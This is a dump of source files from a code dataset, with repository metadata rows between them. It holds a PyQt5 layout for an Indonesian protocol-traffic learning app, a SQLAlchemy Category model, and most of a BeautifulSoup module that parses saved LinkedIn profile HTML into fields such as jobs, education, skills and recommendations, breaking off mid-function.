sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label.sizePolicy().hasHeightForWidth())
self.label.setSizePolicy(sizePolicy)
self.label.setMinimumSize(QtCore.QSize(0, 100))
self.label.setMaximumSize(QtCore.QSize(16777215, 16777215))
font = QtGui.QFont()
font.setPointSize(18)
font.setFamily("Lato")
font.setBold(True)
self.label.setFont(font)
self.label.setFrameShadow(QtWidgets.QFrame.Plain)
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.label.setObjectName("label")
self.verticalLayout_2.addWidget(self.label)
self.gridLayout_2 = QtWidgets.QGridLayout()
self.gridLayout_2.setContentsMargins(10, -1, -1, -1)
self.gridLayout_2.setObjectName("gridLayout_2")
# About Button
self.aboutBtn = QtWidgets.QPushButton(self.centralwidget)
self.aboutBtn.setMinimumSize(QtCore.QSize(0, 50))
# self.aboutBtn.setGraphicsEffect(self.shadow)
font = QtGui.QFont()
font.setFamily("Century")
font.setPointSize(-1)
self.aboutBtn.setFont(font)
self.aboutBtn.setStyleSheet(qss_file)
self.aboutBtn.setObjectName("aboutBtn")
self.gridLayout_2.addWidget(self.aboutBtn, 3, 0, 1, 1)
self.glosariumBtn = QtWidgets.QPushButton(self.centralwidget)
self.glosariumBtn.setMinimumSize(QtCore.QSize(0, 50))
font = QtGui.QFont()
font.setFamily("Century")
font.setPointSize(-1)
self.glosariumBtn.setFont(font)
self.glosariumBtn.setStyleSheet(qss_file)
self.glosariumBtn.setObjectName("glosariumBtn")
self.gridLayout_2.addWidget(self.glosariumBtn, 2, 0, 1, 1)
self.quizBtn = QtWidgets.QPushButton(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.quizBtn.sizePolicy().hasHeightForWidth())
self.quizBtn.setSizePolicy(sizePolicy)
self.quizBtn.setMinimumSize(QtCore.QSize(0, 50))
font = QtGui.QFont()
font.setFamily("Century")
font.setPointSize(-1)
self.quizBtn.setFont(font)
self.quizBtn.setStyleSheet(qss_file)
self.quizBtn.setObjectName("quizBtn")
self.gridLayout_2.addWidget(self.quizBtn, 1, 0, 1, 1)
self.lihat_protocolBtn = QtWidgets.QPushButton(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lihat_protocolBtn.sizePolicy().hasHeightForWidth())
self.lihat_protocolBtn.setSizePolicy(sizePolicy)
self.lihat_protocolBtn.setMinimumSize(QtCore.QSize(20, 50))
font = QtGui.QFont()
font.setFamily("Century")
font.setPointSize(-1)
self.lihat_protocolBtn.setFont(font)
self.lihat_protocolBtn.setStyleSheet(qss_file)
self.lihat_protocolBtn.setAutoDefault(False)
self.lihat_protocolBtn.setDefault(False)
self.lihat_protocolBtn.setFlat(False)
self.lihat_protocolBtn.setObjectName("lihat_protocolBtn")
self.gridLayout_2.addWidget(self.lihat_protocolBtn, 0, 0, 1, 1)
self.verticalLayout_2.addLayout(self.gridLayout_2)
self.horizontalLayout.addLayout(self.verticalLayout_2)
mainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(mainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 21))
self.menubar.setObjectName("menubar")
mainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(mainWindow)
self.statusbar.setObjectName("statusbar")
mainWindow.setStatusBar(self.statusbar)
self.retranslateUi(mainWindow)
QtCore.QMetaObject.connectSlotsByName(mainWindow)
def retranslateUi(self, mainWindow):
_translate = QtCore.QCoreApplication.translate
mainWindow.setWindowTitle(_translate("mainWindow", "Aplikasi Pembelajaran Lalu Lintas Protokol"))
self.label.setText(_translate("mainWindow", "Aplikasi Pembelajaran Lalu Lintas Protokol"))
self.aboutBtn.setText(_translate("mainWindow", "Tentang Aplikasi"))
self.glosariumBtn.setText(_translate("mainWindow", "Glosarium"))
self.quizBtn.setText(_translate("mainWindow", "Kuis"))
self.lihat_protocolBtn.setText(_translate("mainWindow", "Lihat Lalu Lintas Protokol"))
# if __name__ == "__main__":
# import sys
# app = QtWidgets.QApplication(sys.argv)
# # mainWindow = QtWidgets.QMainWindow()
# # app = QApplication(sys.argv)
# w = MainWindow()
# sys.exit(app.exec_())
# # ui = MainWindow()
# # ui.setupUi(mainWindow)
# # mainWindow.show()
# # sys.exit(app.exec_())
| [
"adikadarmesta8@gmail.com"
] | adikadarmesta8@gmail.com |
3f9379943d8445f0a65b38ee633c6c1d526a46e9 | c5c6e54a9f3139f1df2e5896fc0c8b1c05a0b0e3 | /category/models.py | f7caa045cfd4cbf23636a3d22553d8ec5ddccdbf | [] | no_license | npwaters/item-catalog-web-application | 03ba146712b26bfe248b036eaa67eaaf5c4bd072 | d358bd1f59b31f706bab61289ddc38927862256f | refs/heads/master | 2022-12-10T00:39:44.873106 | 2019-12-09T05:51:06 | 2019-12-09T05:51:06 | 222,643,120 | 1 | 0 | null | 2022-12-08T06:54:27 | 2019-11-19T08:12:06 | Python | UTF-8 | Python | false | false | 537 | py | from sqlalchemy import Column, ForeignKey, Integer, String
from sqlalchemy.orm import relationship
from app import Base
from user.models import User
class Category(Base):
__tablename__ = "category"
id = Column(Integer, primary_key=True)
name = Column(String(80), nullable=False)
user_id = Column(Integer, ForeignKey("user.id"))
user = relationship(User)
@property
def serialize(self):
return {
"id": self.id,
"name": self.name,
"user_id": self.user_id
}
| [
"40352015+npwaters@users.noreply.github.com"
] | 40352015+npwaters@users.noreply.github.com |
3ec60458eceee57fc72037f687c461ce3fa0b78e | 7de6ddf76a60519dacde732a546c24dff536f51a | /Linkedin_crawler/profile_html_handler.py | 4360708ee8788d3a5380cb311a755344baf21f0a | [] | no_license | J-Pascual-Rocamora/Linkedin_crawler | 08c1923099ee32d1ad6ee3728a01050568b33457 | 58b0ab23953bb66b0a5878db669a53dfef571d2d | refs/heads/master | 2021-05-10T08:25:06.356575 | 2018-01-25T17:17:37 | 2018-01-25T17:17:37 | 118,890,046 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 65,917 | py | # -*- coding: UTF-8 -*-
import os
import re
from bs4 import BeautifulSoup
def get_top_card(web_html):
'''Recieves a LinkedIn profile html and returns a list with the information on the header, just below the name title.
Parameters
----------
web_html
Html code of a LinkedIn profile.
Returns
-------
list
[0] : Name
[1] : Distance on network
[2] : Current position
[3] : Current company
[4] : Last company
[5] : Last education
[6] : Location
[7] : Number of connections_html
[8] : Summary
'''
info_block = []
#top_card_section = web_html.find('div', attrs={'class':'pv-top-card-section__information mt3 ember-view'})
top_card_section = web_html.find('section', attrs={'class':'pv-profile-section pv-top-card-section artdeco-container-card ember-view'})
# Get the name
name_html = top_card_section.find('h1', attrs={'class':'pv-top-card-section__name Sans-26px-black-85%'})
name_html = web_html.find('h1', attrs={'class':'pv-top-card-section__name Sans-26px-black-85%'})
if name_html:
name_text = name_html.text.strip()
if not name_html:
name_text = ''
print ('ERROR: No name_section not found')
print ('Other labels found:')
all_classes = top_card_section.find_all('h1')
for i in range(0, len(all_classes)):
try:
print ('\t' + str(all_classes[i]['class']))
except:
pass
#print 'Name: ' + str(name_text.encode('utf-8'))
# Get distance value (network distance)
distance_html = top_card_section.find('span', attrs={'class':'dist-value'})
if distance_html:
distance_text = distance_html.text.strip()
if not distance_text:
distance_text = 'Not in network'
#print 'Distance: ' + str(distance_text)
# Get current employment line, just below the name
current_ocupation_html = top_card_section.find('h2', attrs={'class':'pv-top-card-section__headline Sans-19px-black-85%'})
if current_ocupation_html:
current_ocupation_text = current_ocupation_html.text.strip()
current_broken = current_ocupation_text.split(' at ')
current_position = current_broken[0]
if len(current_broken) > 1:
current_company = current_broken[1]
if len(current_broken) == 1:
current_company = ''
if not current_ocupation_html:
current_position = ''
current_company = ''
#print 'Current postion: ' + str(current_position.encode('utf-8'))
#print 'Current company: ' + str(current_company.encode('utf-8'))
# Get last company
last_company_html = top_card_section.find('h3', attrs={'class':'pv-top-card-section__company Sans-17px-black-70% mb1 inline-block'})
if last_company_html:
last_company_text = last_company_html.text.strip()
if not last_company_html:
last_company_text = ''
#print 'Last company: ' + str(last_company_text.encode('utf-8'))
# Get last education
last_education_html = top_card_section.find('h3', attrs={'class':'pv-top-card-section__school pv-top-card-section__school--with-separator Sans-17px-black-70% mb1 inline-block'})
if last_education_html:
last_education_text = last_education_html.text.strip()
if not last_education_html:
last_education_text = ''
#print 'Last education: ' + str(last_education_text.encode('utf-8'))
# Get current location
location_html = top_card_section.find('h3', attrs={'class':'pv-top-card-section__location Sans-17px-black-70% mb1 inline-block'})
if location_html:
location_text = location_html.text.strip()
if not location_html:
location_text = ''
#print 'Location: ' + str(location_text.encode('utf-8'))
# Get number of conections
connections_text = ''
connections_html = top_card_section.find('h3', attrs={'class':'pv-top-card-section__connections pv-top-card-section__connections--with-separator Sans-17px-black-70% mb1 inline-block'})
if connections_html:
connections_span = connections_html.find('span')
if connections_span:
connections_text = connections_span.text.strip()
#print 'Connections: ' + str(connections_text)
# Get summary_html
summary_html = web_html.find('p', attrs={'class':'pv-top-card-section__summary-text text-align-left Sans-15px-black-55% mt5 pt5 ember-view'})
if summary_html:
summary_text = summary_html.text.strip()
if not summary_html:
summary_text = ''
#print summary_text.encode('utf-8')
info_block.append(name_text)
info_block.append(distance_text)
info_block.append(current_position)
info_block.append(current_company)
info_block.append(last_company_text)
info_block.append(last_education_text)
info_block.append(location_text)
info_block.append(connections_text)
info_block.append(summary_text)
return info_block
def get_other_links(web_html):
'''Recieves a LinkedIn profile html and returns a list with the links on the contact personal information.
Parameters
----------
web_html
Html code of the web to be analysed
Returns
-------
list
Conains all the links shown in the contact personal information
'''
links_pool = []
contact_info_block = web_html.find('section', attrs={'class':'pv-profile-section pv-contact-info artdeco-container-card ember-view'})
if contact_info_block:
for link in contact_info_block.find_all('a', href=True):
links_pool.append(link['href'])
if not contact_info_block:
print ('ERROR: No other links section found')
print ('Other sections found:')
all_secs = web_html.fin_all('section')
for i in range(0, len(all_secs)):
try:
print ('\t' + str(all_secs[i]['class']))
except:
pass
return links_pool
def get_jobs(web_html):
'''Recieves a LinkedIn profile html and returns a list with the information displayed on the experience section.
Parameters
----------
web_html
Html code of a LinkedIn profile.
Returns
-------
list
[0] : Companies at which the candidate has work
[1] : Dates, start and end time of the position
[2] : Time spent at the position
[3] : Locations at which the position was developed
[4] : Resumes of the positions
'''
all_experience = []
positions = []
companies = []
dates = []
time_spent = []
locations = []
resumes = []
ul_class_pool = ['pv-profile-section__section-info section-info pv-profile-section__section-info--has-more',
'pv-profile-section__section-info section-info pv-profile-section__section-info--has-more ember-view',
'pv-profile-section__section-info section-info pv-profile-section__section-info--has-no-more',
'pv-profile-section__section-info section-info pv-profile-section__section-info--has-no-more ember-view',]
experience_section = web_html.find('section', attrs={'class':'pv-profile-section experience-section ember-view'})
if experience_section:
for i in range(0, len(ul_class_pool)):
experience_block = experience_section.find('ul', attrs={'class':ul_class_pool})
if experience_block:
break
if not experience_block:
print ('ERROR: No experience_block found.')
print ('Others uls found:')
all_uls = experience_section.find_all('ul')
for i in range(0, len(all_uls)):
try:
print ('\t' + str(all_uls[i]['class']))
except:
pass
for child in experience_block.children:
if len(child) > 1:
# Create html item
job = BeautifulSoup(str(child), 'html.parser')
# Get position
position_html = job.find('h3')
if position_html:
position_text = position_html.text.strip()
positions.append(position_text)
if not position_html:
positions.append('')
# Get company
company_html = job.find('h4', attrs={'class':'Sans-17px-black-85%'})
if company_html:
company_text = company_html.text.strip()
companies.append(company_text.replace('Company Name\n', ''))
if not company_html:
companies.append('')
# Get dates
date_html = job.find('h4', attrs={'class':'pv-entity__date-range inline-block Sans-15px-black-70%'})
if date_html:
date_text = date_html.text.strip()
dates.append(date_text.replace('Dates Employed\n', ''))
if not date_html:
dates.append('')
# Get time spent
time_html = job.find('h4', attrs={'class':'inline-block Sans-15px-black-70%'})
if time_html:
time_text = time_html.text.strip()
time_spent.append(time_text.replace('Employment Duration\n', ''))
if not time_html:
time_spent.append('')
# Get location
loc_html = job.find('h4', attrs={'class':'pv-entity__location Sans-15px-black-70% block'})
if loc_html:
loc_text = loc_html.text.strip()
locations.append(loc_text.replace('Location\n', ''))
if not loc_html:
locations.append('')
# Get resume
resume_html = job.find('div', attrs={'class':'pv-entity__extra-details'})
if resume_html:
resume_text = resume_html.text.strip()
resumes.append(resume_text)
if not resume_html:
resumes.append('')
all_experience.append(positions)
all_experience.append(companies)
all_experience.append(dates)
all_experience.append(time_spent)
all_experience.append(locations)
all_experience.append(resumes)
if not experience_section:
all_experience.append(positions)
all_experience.append(companies)
all_experience.append(dates)
all_experience.append(time_spent)
all_experience.append(locations)
all_experience.append(resumes)
return all_experience
def get_education(web_html):
'''Recieves a LinkedIn profile html and returns a list with the information displayed on the education section.
Parameters
----------
web_html
Html code of a LinkedIn profile.
Returns
-------
list
[0] : Institutions at which the studies have been developed
[1] : Degrees title
[2] : Fields of study
[3] : Dates of studies
[4] : Others. Other information displayed
[5] : Resumes. Information about the education
'''
all_educations = []
institutions = []
degrees = []
fields = []
dates = []
others = []
resumes = []
ul_class_pool = ['pv-profile-section__section-info section-info pv-profile-section__section-info--has-more',
'pv-profile-section__section-info section-info pv-profile-section__section-info--has-more ember-view',
'pv-profile-section__section-info section-info pv-profile-section__section-info--has-no-more',
'pv-profile-section__section-info section-info pv-profile-section__section-info--has-no-more ember-view',]
education_section = web_html.find('section', attrs={'class':'pv-profile-section education-section ember-view'})
if education_section:
for i in range(0, len(ul_class_pool)):
education_block = education_section.find('ul', attrs={'class':ul_class_pool})
if education_block:
break
if not education_block:
print ('ERROR: no education_block found')
print ('Others uls found:')
all_uls = education_section.find_all('ul')
for i in range(0, len(all_uls)):
try:
print ('\t' + str(all_uls[i]['class']))
except:
pass
if education_block:
for child in education_block.children:
if len(child) > 1:
# Generate html item
edu = BeautifulSoup(str(child), 'html.parser')
# Get the school or institution
institution = edu.find('h3')
if institution:
institution_text = institution.text.strip()
institutions.append(institution_text)
#print institution_text
if not institution:
institutions.append('')
# Get the
degree = edu.find('p', attrs={'class':'pv-entity__secondary-title pv-entity__degree-name pv-entity__secondary-title Sans-15px-black-85%'})
if degree:
degree_text = degree.text.strip()
degrees.append(degree_text.replace('Degree Name\n', ''))
#print degree_text.replace('Degree Name\n', '')
if not degree:
degrees.append('')
# Get the field
field = edu.find('p', attrs={'class':'pv-entity__secondary-title pv-entity__fos pv-entity__secondary-title Sans-15px-black-70%'})
if field:
field_text = field.text.strip()
#print field_text.replace('Field Of Study\n', '')
fields.append(field_text.replace('Field Of Study\n', ''))
if not field:
fields.append('')
# Get the dates
date = edu.find('p', attrs={'class':'pv-entity__dates Sans-15px-black-70%'})
if date:
date_text = date.text.strip()
#print date_text.replace('Dates attended or expected graduation\n\n', '')
dates.append(date_text.replace('Dates attended or expected graduation\n\n', ''))
if not date:
dates.append('')
# Get others, such as activites and societies...
other = edu.find('p', attrs={'class':'pv-entity__secondary-title Sans-15px-black-70%'})
if other:
other_text = other.text.strip()
#print other_text.replace('Activities and Societies:\n', '')
others.append(other_text.replace('Activities and Societies:\n', ''))
if not other:
others.append('')
# Get the resumes
resume = edu.find('div', attrs={'class':'pv-entity__extra-details'})
if resume:
resume_text = resume.text.strip()
#print resume_text
resumes.append(resume_text)
if not resume:
resumes.append('')
#print ''
all_educations.append(institutions)
all_educations.append(degrees)
all_educations.append(fields)
all_educations.append(dates)
all_educations.append(others)
all_educations.append(resumes)
if not education_section:
institutions.append('NULL')
degrees.append('NULL')
fields.append('NULL')
dates.append('NULL')
others.append('NULL')
resumes.append('NULL')
all_educations.append(institutions)
all_educations.append(degrees)
all_educations.append(fields)
all_educations.append(dates)
all_educations.append(others)
all_educations.append(resumes)
return all_educations
def get_volunteer(web_html):
'''Recieves a LinkedIn profile html and returns a list with the information displayed on the volunteer section.
Parameters
----------
web_html
Html code of a LinkedIn profile.
Returns
-------
list
[0] : Position titles
[1] : Companies or organizations
[2] : Dates of start and end
[3] : Total time spent at each position
[4] : Others. Other information displayed
[5] : Resumes. Information about the volunteer
'''
titles = []
companies = []
dates = []
times = []
others = []
resumes = []
all_volunteers = []
ul_class_pool = ['pv-profile-section__section-info section-info pv-profile-section__section-info--has-more',
'pv-profile-section__section-info section-info pv-profile-section__section-info--has-more ember-view',
'pv-profile-section__section-info section-info pv-profile-section__section-info--has-no-more',
'pv-profile-section__section-info section-info pv-profile-section__section-info--has-no-more ember-view',]
volunteer_section = web_html.find('section', attrs={'class':'pv-profile-section volunteering-section ember-view'})
volunteer_flag = True
if volunteer_section:
for i in range(0, len(ul_class_pool)):
volunteer_block = volunteer_section.find('ul', attrs={'class':ul_class_pool})
if volunteer_block:
break
if not volunteer_block:
print ('ERROR: No volunteer_block found.')
print ('Other uls found:')
all_uls = volunteer_section.fin_all('ul')
for i in range(0, len(all_uls)):
try:
print ('\t' + str(all_uls[i]['class']))
except:
pass
if volunteer_block:
for child in volunteer_block.children:
if len(child) > 1:
# Generate html item
volunteer = BeautifulSoup(str(child), 'html.parser')
# Get title
title_html = volunteer.find('h3', attrs={'class':'Sans-17px-black-85%-semibold'})
if title_html:
title_text = title_html.text.strip()
if not title_html:
title_text = ''
#print title_text.encode('utf-8')
titles.append(title_text)
# Get company
company_html = volunteer.find('h4', attrs={'class':'Sans-15px-black-85%'})
if company_html:
company_text = company_html.text.strip()
if not company_html:
company_text = ''
#print company_text.encode('utf-8')
companies.append(company_text.replace('Company Name\n', ''))
# Get dates
date_html = volunteer.find('h4', attrs={'class':'pv-entity__date-range detail-facet inline-block Sans-15px-black-70%'})
if date_html:
date_text = date_html.text.strip()
if not date_html:
date_text = ''
#print date_text.encode('utf-8')
dates.append(date_text.replace('Dates volunteered\n', ''))
# Get time
time_html = volunteer.find('h4', attrs={'class':'detail-facet inline-block Sans-15px-black-70%'})
if time_html:
time_text = time_html.text.strip()
if not time_html:
time_text = ''
#print time_text.encode('utf-8')
times.append(time_text.replace('Volunteer duration\n', ''))
# Get others
others_html = volunteer.find('h4', attrs={'class':'pv-entity__cause Sans-15px-black-70%'})
if others_html:
other_text = others_html.text.strip()
if not others_html:
other_text = ''
#print other_text.encode('utf-8')
others.append(other_text.replace('Cause', ''))
# Get resume
resume_html = volunteer.find('div', attrs={'class':'pv-entity__extra-details'})
if resume_html:
resume_text = resume_html.text.strip()
if not resume_html:
resume_text = ''
#print resume_text.encode('utf-8')
resumes.append(resume_text)
all_volunteers.append(titles)
all_volunteers.append(companies)
all_volunteers.append(dates)
all_volunteers.append(times)
all_volunteers.append(others)
all_volunteers.append(resumes)
if not volunteer_section:
all_volunteers.append(titles)
all_volunteers.append(companies)
all_volunteers.append(dates)
all_volunteers.append(times)
all_volunteers.append(others)
all_volunteers.append(resumes)
return all_volunteers
def get_skills(web_html):
'''Recieves a LinkedIn profile html and returns a list with the information displayed on the skills section.
Parameters
----------
web_html
Html code of a LinkedIn profile.
Returns
-------
list
[0] : Skill names
[1] : Skill number of endorsements
'''
name_number = []
skill_names = []
skill_endorsmentes = []
class_labels = ['pv-profile-section pv-featured-skills-section artdeco-container-card ember-view',
'pv-profile-section pv-featured-skills-section artdeco-container-card first-degree ember-view']
# Find section
for i in range(0, len(class_labels)):
skills_section = web_html.find('section', attrs={'class':class_labels[i]})
if skills_section:
break
if skills_section:
# Get top list
top_list = skills_section.find_all('li', attrs={'class':'pv-skill-entity--featured pb5 pv-skill-entity relative pv-skill-entity--include-highlights ember-view'})
for item in top_list:
spans_list = item.find_all('span')
skill_name = spans_list[0].text.strip()
skill_names.append(skill_name)
if len(spans_list) > 1:
endorsments = spans_list[1].text.strip()
no_see = endorsments.replace('See ', '')
no_endors = no_see.replace(' endorsements for ', '')
no_endor = no_endors.replace(' endorsement for ', '')
no_name = no_endor.replace(skill_name, '')
try:
number_integer = int(no_name)
except:
no_name = '0'
else:
no_name = '0'
skill_endorsmentes.append(no_name)
# Get pool list
pool_list = skills_section.find_all('li', attrs={'class':'pv-skill-entity--featured pb5 pv-skill-entity relative ember-view'})
if pool_list:
for item in pool_list:
spans_list = item.find_all('span')
skill_name = spans_list[0].text.strip()
skill_names.append(skill_name)
if len(spans_list) > 1:
endorsments = spans_list[1].text.strip()
no_see = endorsments.replace('See ', '')
no_endors = no_see.replace(' endorsements for ', '')
no_endor = no_endors.replace(' endorsement for ', '')
no_name = no_endor.replace(skill_name, '')
try:
number_integer = int(no_name)
except:
no_name = '0'
else:
no_name = '0'
skill_endorsmentes.append(no_name)
name_number.append(skill_names)
name_number.append(skill_endorsmentes)
return name_number
def get_recommendation_buttons(web_html):
'''Not in use.
Gets the text on the recommendation labels.'''
#html/body/div[5]/div[4]/div[2]/div/div/div/div[2]/div[1]/div[2]/div[6]/div/section/div/artdeco-tabs/artdeco-tablist/artdeco-tab[1]
#html/body/div[5]/div[4]/div[2]/div/div/div/div[2]/div[1]/div[2]/div[6]/div/section/div/artdeco-tabs/artdeco-tablist/artdeco-tab[2]
received_text = ''
given_text = ''
recommendation_text = []
received_number = re.findall('Received \([0-9]+\)', str(web_html))
if received_number:
received_text = received_number[0]
given_number = re.findall('Given \([0-9]+\)', str(web_html))
if given_number:
given_text = given_number[0]
recommendation_text.append(received_text)
recommendation_text.append(given_text)
return recommendation_text
def get_recieved_recommendations(web_html):
'''Recieves a LinkedIn profile html and returns a list with the recieved recommendations information.
Parameters
----------
web_html
Html code of a LinkedIn profile.
Returns
-------
list
[0] : Name of the person to whom the recommendation was written
[1] : Recommendees positions
[2] : Professional relationship with the candidate
[3] : Recommendation text
'''
person_names = []
person_titles = []
common_works = []
recommendations = []
all_recomentadions = []
recommendations_html = web_html.find('artdeco-tabs', attrs={'class':'ivy-tabs ember-view'})
if recommendations_html:
recommendations_block = recommendations_html.find('ul', attrs={'class':'section-info'})
if recommendations_block:
for child in recommendations_block.children:
if len(child) > 1:
item = BeautifulSoup(str(child), 'html.parser')
# Get name of person who gives the recommendation
person_html = item.find('h3', attrs={'class':'Sans-17px-black-85%-semibold-dense'})
if person_html:
person_text = person_html.text.strip()
if not person_html:
person_text = ''
#print 'Recommendation given by: ' + str(person_text.encode('utf-8'))
person_names.append(person_text)
# Get the title of the person who gives the recommendation
person_title_html = item.find('p', attrs={'class':'pv-recommendation-entity__headline Sans-15px-black-55% pb1'})
if person_title_html:
person_title_text = person_title_html.text.strip()
if not person_title_html:
person_title_text = ''
#print 'Title: ' + str(person_title_text.encode('utf-8'))
person_titles.append(person_title_text)
# Get the time and the company where they work together
common_html = item.find('p', attrs={'class':'Sans-13px-black-55%'})
if common_html:
common_text = common_html.text.strip()
if not common_html:
common_text = ''
#print 'Work together: ' + str(common_text.encode('utf-8'))
common_works.append(common_text)
# Get the recommendation text
recommendation_html = item.find('div', attrs={'class':'pv-recommendation-entity__highlights'})
if recommendation_html:
recommendation_text = recommendation_html.text.strip()
if not recommendation_html:
recommendation_text = ''
#print 'Recommendation: ' + str(recommendation_text.encode('utf-8'))
recommendations.append(recommendation_text)
all_recomentadions.append(person_names)
all_recomentadions.append(person_titles)
all_recomentadions.append(common_works)
all_recomentadions.append(recommendations)
return all_recomentadions
def get_given_recommendations(web_html):
'''Recieves a LinkedIn profile html and returns a list with the given recommendations information.
Parameters
----------
web_html
Html code of a LinkedIn profile.
Returns
-------
list
[0] : Name of the person to whom the recommendation was written
[1] : Recommendees positions
[2] : Professional relationship with the candidate
[3] : Recommendation text
'''
person_names = []
person_titles = []
common_works = []
recommendations = []
all_recomentadions = []
recommendations_html = web_html.find('artdeco-tabs', attrs={'class':'ivy-tabs ember-view'})
if recommendations_html:
recommendations_block = recommendations_html.find_all('ul', attrs={'id':'recommendation-list'})
if not recommendations_block[1]:
print ('ERROR: no recommendations_block[1] found.')
print ('Other uls found:')
for i in range(0, len(recommendations_block)):
print ('\t' + str(recommendations_block[i]))
if recommendations_block[1]:
for child in recommendations_block[1].children:
if len(child) > 1:
# Create html item
item = BeautifulSoup(str(child), 'html.parser')
# Get the name
name_html = item.find('h3', attrs={'class':'Sans-17px-black-85%-semibold-dense'})
if name_html:
name_text = name_html.text.strip()
else:
name_text = 'NULL'
person_names.append(name_text)
# Get position
position_html = item.find('p', attrs={'class':'pv-recommendation-entity__headline Sans-15px-black-55% pb1'})
if position_html:
position_text = position_html.text.strip()
else:
position_text = 'NULL'
person_titles.append(position_text)
# Get common works
common_works_html= item.find('p', attrs={'class':'Sans-13px-black-55%'})
if common_works_html:
common_works_text = common_works_html.text.strip()
else:
common_works_text = 'NULL'
common_works.append(common_works_text)
# Get recommendation text
recommendation_html = item.find('div', attrs={'class':'pv-recommendation-entity__highlights'})
if recommendation_html:
recommendation_text = recommendation_html.text.strip()
else:
recommendation_text = 'NULL'
recommendations.append(recommendation_text)
all_recomentadions.append(person_names)
all_recomentadions.append(person_titles)
all_recomentadions.append(common_works)
all_recomentadions.append(recommendations)
return all_recomentadions
def get_recommendations(web_html, block_number):
## Check this docs
'''Recieves a LinkedIn profile html and returns a list with the given recommendations information.
Parameters
----------
web_html
Html code of a LinkedIn profile.
block_number
Returns
-------
list
[0] : Name of the person to whom the recommendation was written
[1] : Recommendees positions
[2] : Professional relationship with the candidate
[3] : Recommendation text
'''
person_names = []
person_titles = []
common_works = []
recommendations = []
all_recomentadions = []
recommendations_html = web_html.find('artdeco-tabs', attrs={'class':'ivy-tabs ember-view'})
if recommendations_html:
recommendations_block = recommendations_html.find_all('ul', attrs={'id':'recommendation-list'})
if not recommendations_block[block_number]:
print ('ERROR: recommendations_block[' + str(block_number) + '] not found.')
print ('Other uls found:')
for i in range(0, len(recommendations_block)):
try:
print ('\t' + str(recommendations_block[i]['id']))
except:
pass
if recommendations_block[block_number]:
for child in recommendations_block[block_number].children:
if len(child) > 1:
# Create html item
item = BeautifulSoup(str(child), 'html.parser')
# Get the name
name_html = item.find('h3', attrs={'class':'Sans-17px-black-85%-semibold-dense'})
if name_html:
name_text = name_html.text.strip()
else:
name_text = 'NULL'
person_names.append(name_text)
# Get position
position_html = item.find('p', attrs={'class':'pv-recommendation-entity__headline Sans-15px-black-55% pb1'})
if position_html:
position_text = position_html.text.strip()
else:
position_text = 'NULL'
person_titles.append(position_text)
# Get common works
common_works_html= item.find('p', attrs={'class':'Sans-13px-black-55%'})
if common_works_html:
common_works_text = common_works_html.text.strip()
else:
common_works_text = 'NULL'
common_works.append(common_works_text)
# Get recommendation text
recommendation_html = item.find('div', attrs={'class':'pv-recommendation-entity__highlights'})
if recommendation_html:
recommendation_text = recommendation_html.text.strip()
else:
recommendation_text = 'NULL'
recommendations.append(recommendation_text)
all_recomentadions.append(person_names)
all_recomentadions.append(person_titles)
all_recomentadions.append(common_works)
all_recomentadions.append(recommendations)
return all_recomentadions
def get_accomplishment_button_names(web_html):
'''Recieves a LinkedIn profile html and returns a list with the class name labels of the accomplishments section.
Parameters
----------
web_html
Html code of a LinkedIn profile.
Returns
-------
list
Class labels of the accomplishmet blocks
'''
buttons_list = []
accomplishment_block = web_html.findAll('button', attrs={'class':'pv-accomplishments-block__expand'})
for i in range(0, len(accomplishment_block)):
button_attribute = accomplishment_block[i]['data-control-name']
if button_attribute not in buttons_list:
buttons_list.append(button_attribute)
return buttons_list
def get_publications_data(web_html):
'''Recieves a LinkedIn profile html and returns a list with the publications information.
Parameters
----------
web_html
Html code of a LinkedIn profile.
Returns
-------
list
[0] : Publication titles
[1] : Dates of publications
[2] : Journals in which are publish the publications
[3] : Resumes of publications
[4] : Links of publications
'''
titles_pool = []
dates_pool = []
journals_pool = []
resumes_pool = []
links_pool = []
publications_data = []
class_labels = ['pv-accomplishments-block__list ',
'pv-accomplishments-block__list pv-accomplishments-block__list--has-more']
publications_block = web_html.find('section', attrs={'class':'accordion-panel pv-profile-section pv-accomplishments-block publications pv-accomplishments-block--expanded ember-view'})
for i in range(0, len(class_labels)):
publications_list = publications_block.find('ul', attrs={'class':class_labels[i]})
if publications_list:
break
if not publications_list:
print ('ERROR: publications_list not found.')
print ('Other uls found:')
all_uls = publications_block.find_all('ul')
for i in range(0, len(all_uls)):
try:
print ('\t' + str(all_uls[i]['class']))
except:
pass
for child in publications_list.children:
if len(child) > 1:
item = BeautifulSoup(str(child), "html.parser")
# Get publication title
#title_html = publis_block[n].find('h4', attrs={'class':'pv-accomplishment-entity__title'})
title_html = item.find('h4', attrs={'class':'pv-accomplishment-entity__title'})
title_text = ''
if title_html:
title_text = title_html.text.strip()
titles_pool.append(title_text.replace('publication title\n', ''))
#print 'Title: ' + str(title_text.encode('utf-8'))
# Get publication date
#date_html = publis_block[n].find('span', attrs={'class':'pv-accomplishment-entity__date'})
date_html = item.find('span', attrs={'class':'pv-accomplishment-entity__date'})
date_text = ''
if date_html:
date_text = date_html.text.strip()
dates_pool.append(date_text.replace('publication date', ''))
#print 'Date: ' + str(date_text.encode('utf-8'))
# Get publcation journal
#journal_html = publis_block[n].find('span', attrs={'class':'pv-accomplishment-entity__publisher'})
journal_html = item.find('span', attrs={'class':'pv-accomplishment-entity__publisher'})
journal_text = ''
if journal_html:
journal_text = journal_html.text.strip()
journals_pool.append(journal_text.replace('publication description\n', ''))
#print 'Journal: ' + str(journal_text.encode('utf-8'))
# Get publication resume
#resume_html = publis_block[n].find('p', attrs={'class':'pv-accomplishment-entity__description Sans-15px-black-70%'})
resume_html = item.find('p', attrs={'class':'pv-accomplishment-entity__description Sans-15px-black-70%'})
resume_text = ''
if resume_html:
resume_text = resume_html.text.strip()
